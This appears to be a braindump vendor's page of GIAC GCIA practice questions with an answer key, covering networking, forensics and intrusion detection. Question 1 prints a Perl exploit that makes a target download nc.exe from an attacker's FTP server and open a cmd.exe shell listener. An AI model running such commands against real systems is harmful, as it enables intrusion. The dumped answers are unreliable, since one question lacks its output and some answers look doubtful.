The Refresh Guide To GCIA Testing Software
Your success in GIAC GCIA is our sole target and we develop all our GCIA braindumps in a way that facilitates the attainment of this target. Not only is our GCIA study material the best you can find, it is also the most detailed and the most updated. GCIA Practice Exams for GIAC GCIA are written to the highest standards of technical accuracy.
Also have GCIA free dumps questions for you:
NEW QUESTION 1
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ... \n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when
download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
- A. Creates a share called "sasfile" on the target system
- B. Opens up a SMTP server that requires no username or password
- C. Creates an FTP server with write permissions enabled
- D. Opens up a telnet listener that requires no username or password
Answer: D
NEW QUESTION 2
What is the name of the first computer virus that infected the boot sector of the MS-DOS operating system?
- A. Sircam
- B. Stoner
- C. Code Red
- D. Brain
Answer: D
NEW QUESTION 3
Which of the following commands will you use with the tcpdump command to display the contents of the packets?
- A. tcpdump -q
- B. tcpdump -v
- C. tcpdump -n
- D. tcpdump –A
Answer: D
NEW QUESTION 4
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter?
- A. EnCase image file
- B. PFR image file
- C. RAW image file
- D. iso image file
Answer: D
NEW QUESTION 5
Which of the following terms is used to represent IPv6 addresses?
- A. Colon-dot
- B. Colon-hexadecimal
- C. Hexadecimal-dot notation
- D. Dot notation
Answer: B
NEW QUESTION 6
Adam works as a Security Analyst for Umbrella Inc. He is performing real-time traffic analysis on IP networks using Snort. Adam is facing problems in analyzing intrusion data. Which of the following software combined with Snort can Adam use to get a visual representation of intrusion data?
Each correct answer represents a complete solution. Choose all that apply.
- A. Basic Analysis and Security Engine (BASE)
- B. sguil
- C. KFSensor
- D. OSSIM
Answer: ABD
NEW QUESTION 7
Which of the following TCP/UDP port is used by the toolkit program netstat?
- A. Port 23
- B. Port 15
- C. Port 7
- D. Port 69
Answer: B
NEW QUESTION 8
Which of the following protocols is used to translate IP addresses to Ethernet addresses?
- A. Border Gateway Protocol (BGP)
- B. Routing Information Protocol (RIP)
- C. Address Resolution Protocol (ARP)
- D. Internet Control Message Protocol (ICMP)
Answer: C
NEW QUESTION 9
Which of the following partitions contains the system files that are used to start the operating system?
- A. Boot partition
- B. System partition
- C. Secondary partition
- D. Primary partition
Answer: A
NEW QUESTION 10
Which of the following is the process of categorizing attack alerts produced from an IDS in order to distinguish false positives from actual attacks?
- A. Alarm filtering
- B. Confidence value
- C. Reactive system
- D. Site policy
Answer: A
NEW QUESTION 11
Which of the following tools is used to locate lost files and partitions to restore data from a formatted, damaged, or lost partition in Windows and Apple Macintosh computers?
- A. Easy-Undelete
- B. VirtualLab
- C. File Scavenger
- D. Recover4all Professional
Answer: B
NEW QUESTION 12
Which of the following Web attacks is performed by manipulating codes of programming languages such as SQL, Perl, Java present in the Web pages?
- A. Command injection attack
- B. Code injection attack
- C. Cross-Site Request Forgery
- D. Cross-Site Scripting attack
Answer: B
NEW QUESTION 13
Which of the following commands displays the IPX routing table entries?
- A. sh ipx traffic
- B. sh ipx int e0
- C. sh ipx route
- D. sho ipx servers
Answer: C
NEW QUESTION 14
Which of the following is true for XSS, SQL injection, and RFI?
- A. These are Trojan
- B. These are hacking tool
- C. These are types of Web application vulnerabilitie
- D. These are viruse
Answer: C
NEW QUESTION 15
You work as a Network Security Administrator for NetPerfect Inc. The company has a Windowsbased network. You are incharge of the data and network security of the company. While performing a threat log analysis, you observe that one of the database administrators is pilfering confidential data. What type of threat is this?
- A. Zombie
- B. External threat
- C. Internal threat
- D. Malware
Answer: C
NEW QUESTION 16
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. John wants to redirect all TCP port 80 traffic to UDP port 40, so that he can bypass the firewall of the We-are-secure server. Which of the following tools will John use to accomplish his task?
- A. PsExec
- B. PsList
- C. Fpipe
- D. Cain
Answer: C
NEW QUESTION 17
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform a user must install a packet capture library.
What is the name of this library?
- A. libpcap
- B. WinPCap
- C. PCAP
- D. SysPCap
Answer: B
NEW QUESTION 18
You work as a desktop administrator for BlueSkwer.com. You are logged on to a Windows 7 computer with administrator rights. You have run the 'netsh interface IPv6 show interface' command which displays the following:
What is the first interface index used for?
- A. 6to4 tunneling
- B. MAC address
- C. Intra-Site Automatic Tunnel Addressing Protocol
- D. Loopback
Answer: D
NEW QUESTION 19
Which of the following firewalls depends on the three-way handshake of the TCP protocol?
- A. Stateful firewall
- B. Endian firewall
- C. Proxy-based firewall
- D. Packet filter firewall
Answer: A
NEW QUESTION 20
Which of the following is used as a default port by the TELNET utility?
- A. 21
- B. 80
- C. 23
- D. 20
Answer: C
NEW QUESTION 21
......
Recommend!! Get the Full GCIA dumps in VCE and PDF From Surepassexam, Welcome to Download: https://www.surepassexam.com/GCIA-exam-dumps.html (New 508 Q&As Version)